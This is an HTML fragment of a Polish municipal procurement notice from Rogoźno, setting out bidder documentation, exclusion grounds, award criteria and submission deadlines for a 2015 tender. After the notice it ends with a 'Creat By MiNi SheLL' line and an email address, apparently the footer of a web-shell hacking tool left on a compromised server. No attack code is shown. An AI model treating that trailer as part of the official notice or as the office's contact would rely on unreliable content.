<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rogozno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rogoźnie
ul. Nowa 2
64-610 Rogoźno
pok. nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2015 godzina 09:45, miejsce: Urząd Miejski w Rogoźnie
ul. Nowa 2
64-610 Rogoźno
pok. nr 15 kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com